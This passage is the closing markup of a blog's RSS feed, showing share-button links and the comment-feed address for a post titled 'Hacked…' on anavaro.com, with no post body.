href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fwww.anavaro.com%2Fblog%2Fhacked%2F&amp;linkname=Hacked%20%26%238230%3B" title="Google Reader" rel="nofollow" target="_blank"><img src="http://www.anavaro.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save">Сподели</a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/hacked/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
